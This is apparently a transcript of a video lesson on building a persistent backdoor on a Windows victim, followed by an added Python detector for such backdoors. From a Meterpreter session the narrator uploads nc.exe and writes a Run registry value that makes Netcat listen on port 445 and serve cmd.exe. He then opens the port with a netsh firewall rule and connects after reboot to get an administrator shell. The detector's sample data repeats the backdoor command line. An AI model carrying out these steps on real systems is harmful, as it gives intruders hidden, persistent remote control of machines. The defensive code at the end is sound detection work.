Now, we're going to go a little bit further. What I'm trying to do at this point is to create a backdoor. We have already seen some backdoors, but they're not persistent. They rely on the victim running a program or running a file. Trying to put that into a place where the system will load it every time it boots, for instance, would be a good technique. Trying to get a virus into the Master Boot Record, or somewhere else such as the startup folder, perhaps, you can get that to run. But what I want to try to do in the meantime is use a tool called Netcat. Netcat is very useful because you can set up a listener on a victim's system, pick a port number of your choice and pick a program that you'd like to run, and that lets you connect any time you want to that system, assuming that Netcat is running. Netcat is included in the Metasploit framework, I should say.
What I'm going to do is run the upload command. I think I've got this saved in my video. This is the path, /usr/share/windows-binaries/nc.exe. Notice, I'm using double backslashes, and as I mentioned before, there are some parsing issues, so double backslashes get us around that problem. But what I want to do first is upload the Netcat executable to the Windows directory on the victim system. Can you see it? Let me do that because, again, I am the system account. If you're not system, you won't be able to put the file in that directory; you'd have to try to put it somewhere else. But I want to run it from this directory because that's my first choice. Now, what we want to do is to edit a registry key so that we can get this program to run every time the system boots.
From my Meterpreter shell, I need to type this in very carefully: HKLM\software\microsoft\windows\currentversion\run. I'm missing one of my backslashes. As I said before, that will cause problems. There we go. It's my VMware User Process. I've got another command I need to run. I'm going to up-arrow to bring back my last one. Instead of reg enumkey, I'm going to run the reg setval command, and that should be HKLM\software\microsoft\windows\currentversion\run. Then I need to do a little bit after this. nc -d is the value that I'm setting in this key, and I'm going to give it the path to Netcat, nc.exe. Then I'm telling it which port I'd like the listener to run on, 445. Then run cmd.exe as the actual command when the listener is connected to. Now, I can query the value that I've just set. Get rid of all this. Then I'll change setval to queryval. This lets me confirm that indeed, I have the right parameter set here. I'm running Netcat persistent.
This is the path to it, listening port 445, and the command will be cmd.exe. Our next task is to go ahead and create the firewall rule so that we can allow this 445 traffic through. It's a lot of typing here. We're going to run netsh advfirewall, the firewall module, and then we want to add a rule. We're going to call the rule Netcat just for now; that's fine. We'd have to specify several parameters here, but all this should make sense if you've worked with firewalls before. We're specifying the protocol as TCP, the local port is 445, direction is inbound, the action is allow, and the program that's being referenced is c:\Windows\system32\nc.exe. It's a lot of typing. Well, the reason that didn't work is because I'm not in a command shell. Hold on one second. Verify that I'm still system. Now, I can run that command. It gives me my OK statement, showing me that the firewall rule worked.
Now, since I've put the registry key into this key, software\microsoft\windows\currentversion\run, that means that when I reboot the virtual machine, it should load that Netcat program listening on port 445. We'll go ahead and pause so I can reboot. We lost our Meterpreter session, which is expected when we reboot. I'm going to go ahead and go to another command shell. Now, I'm going to see if my Netcat connection actually works. Netcat's built into Kali; you don't need to specify its path. I'm going to use the verbose option.
I'll give it the address of my victim system, and the port number. This might take a moment. There we go. It gives me a message about inverse host lookup failure; that's fine. Who am I? I'm logged in as an administrator, which is good. Now, this is a persistent connection that I have to this system. Any time I want to log in, I just simply use Netcat and go to this port. Very cool. That's it for the Netcat section. Thank you.
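A defender's check for the persistence shown in this section, added here as an example that is not part of the course or of Metasploit: it parses constructed `reg query` and `netsh advfirewall firewall show rule` output and flags Run-key entries that launch a Netcat-style binary, spawn a shell, and have a matching inbound allow rule. The sample outputs, the flags on the nc command line, and the function names are assumptions.

```python
import re

# Constructed sample of `reg query HKLM\...\CurrentVersion\Run` output on the
# rebooted victim: the Netcat value set in the video next to a benign entry.
RUN_KEY_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    VMware User Process    REG_SZ    "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
    nc    REG_SZ    C:\Windows\system32\nc.exe -Ldp 445 -e cmd.exe
"""
# Constructed sample of `netsh advfirewall firewall show rule name=all verbose`.
FIREWALL_OUTPUT = r"""
Rule Name:                            Netcat
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            In
Protocol:                             TCP
LocalPort:                            445
Program:                              C:\Windows\system32\nc.exe
Action:                               Allow
"""

def parse_run_key(text):
    """Map each Run value name to its command line from 'reg query' output."""
    return dict(re.findall(r"^[ \t]+(.+?)[ \t]{2,}REG_\w+[ \t]{2,}(.+?)[ \t]*$", text, re.M))

def parse_inbound_allow_programs(text):
    """Map lowercased program path -> local port for inbound Allow rules."""
    allowed = {}
    for block in text.split("Rule Name:")[1:]:
        f = dict(re.findall(r"^([\w ]+?):[ \t]+(.+?)[ \t]*$", block, re.M))
        if f.get("Direction") == "In" and f.get("Action") == "Allow" and "Program" in f:
            allowed[f["Program"].lower()] = f.get("LocalPort", "Any")
    return allowed

def find_autostart_backdoors(run_text, fw_text):
    """Flag Run entries that launch a Netcat-style binary, spawn a shell, or are
    explicitly allowed inbound by the firewall; all three is the video's setup."""
    allowed = parse_inbound_allow_programs(fw_text)
    findings = []
    for name, cmd in parse_run_key(run_text).items():
        m = re.match(r'"?([^"]+?\.exe)"?', cmd, re.I)   # executable path, unquoted
        exe = (m.group(1) if m else cmd).lower()
        reasons = []
        if re.search(r"\b(nc|ncat|netcat)\.exe$", exe):
            reasons.append("netcat binary")
        if re.search(r"\b(cmd|powershell)\.exe\b", cmd, re.I):
            reasons.append("spawns shell")
        if exe in allowed:
            reasons.append(f"inbound allow rule on port {allowed[exe]}")
        if reasons:
            findings.append((name, reasons))
    return findings
```

On a live host the same two outputs come from `reg query` and `netsh advfirewall firewall show rule name=all verbose`; the Run key under HKCU deserves the same scan.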